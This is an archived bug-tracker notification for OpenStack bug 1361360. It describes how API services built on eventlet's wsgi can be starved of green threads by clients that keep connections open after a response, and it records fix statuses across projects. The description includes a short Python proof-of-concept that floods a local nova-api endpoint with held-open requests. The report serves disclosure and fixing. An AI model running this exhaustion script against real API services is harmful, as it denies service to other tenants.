yahoo-eng-team team mailing list archive
-
yahoo-eng-team team
-
Mailing list archive
-
Message #41142
[Bug 1361360] Re: Eventlet green threads not released back to the pool leading to choking of new requests
** Also affects: glance/juno
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1361360
Title:
Eventlet green threads not released back to the pool leading to
choking of new requests
Status in Cinder:
Fix Released
Status in Cinder icehouse series:
Fix Released
Status in Cinder juno series:
Fix Released
Status in Glance:
Fix Released
Status in Glance icehouse series:
Fix Committed
Status in Glance juno series:
New
Status in heat:
Fix Released
Status in heat kilo series:
Fix Released
Status in OpenStack Identity (keystone):
Fix Released
Status in OpenStack Identity (keystone) juno series:
Fix Committed
Status in OpenStack Identity (keystone) kilo series:
Fix Released
Status in Manila:
Fix Released
Status in neutron:
Fix Released
Status in neutron icehouse series:
Fix Released
Status in neutron juno series:
Fix Committed
Status in OpenStack Compute (nova):
Fix Released
Status in OpenStack Compute (nova) icehouse series:
Fix Released
Status in OpenStack Security Advisory:
Won't Fix
Status in OpenStack Security Notes:
Won't Fix
Status in Sahara:
Fix Committed
Bug description:
Currently reproduced on Juno milestone 2. but this issue should be
reproducible in all releases since its inception.
It is possible to choke OpenStack API controller services using
wsgi+eventlet library by simply not closing the client socket
connection. Whenever a request is received by any OpenStack API
service for example nova api service, eventlet library creates a green
thread from the pool and starts processing the request. Even after the
response is sent to the caller, the green thread is not returned back
to the pool until the client socket connection is closed. This way,
any malicious user can send many API requests to the API controller
node and determine the wsgi pool size configured for the given service
and then send those many requests to the service and after receiving
the response, wait there infinitely doing nothing leading to
disrupting services for other tenants. Even when service providers
have enabled rate limiting feature, it is possible to choke the API
services with a group (many tenants) attack.
Following program illustrates choking of nova-api services (but this
problem is omnipresent in all other OpenStack API Services using
wsgi+eventlet)
Note: I have explicitly set the wsi_default_pool_size default value to 10 in order to reproduce this problem in nova/wsgi.py.
After you run the below program, you should try to invoke API
============================================================================================
import time
import requests
from multiprocessing import Process
def request(number):
#Port is important here
path = 'http://127.0.0.1:8774/servers'
try:
response = requests.get(path)
print "RESPONSE %s-%d" % (response.status_code, number)
#during this sleep time, check if the client socket connection is released or not on the API controller node.
time.sleep(1000)
print “Thread %d complete" % number
except requests.exceptions.RequestException as ex:
print “Exception occurred %d-%s" % (number, str(ex))
if __name__ == '__main__':
processes = []
for number in range(40):
p = Process(target=request, args=(number,))
p.start()
processes.append(p)
for p in processes:
p.join()
================================================================================================
Presently, the wsgi server allows persist connections if you configure keepalive to True which is default.
In order to close the client socket connection explicitly after the response is sent and read successfully by the client, you simply have to set keepalive to False when you create a wsgi server.
Additional information: By default eventlet passes “Connection: keepalive” if keepalive is set to True when a response is sent to the client. But it doesn’t have capability to set the timeout and max parameter.
For example.
Keep-Alive: timeout=10, max=5
Note: After we have disabled keepalive in all the OpenStack API
service using wsgi library, then it might impact all existing
applications built with the assumptions that OpenStack API services
uses persistent connections. They might need to modify their
applications if reconnection logic is not in place and also they might
experience the performance has slowed down as it will need to
reestablish the http connection for every request.
To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1361360/+subscriptions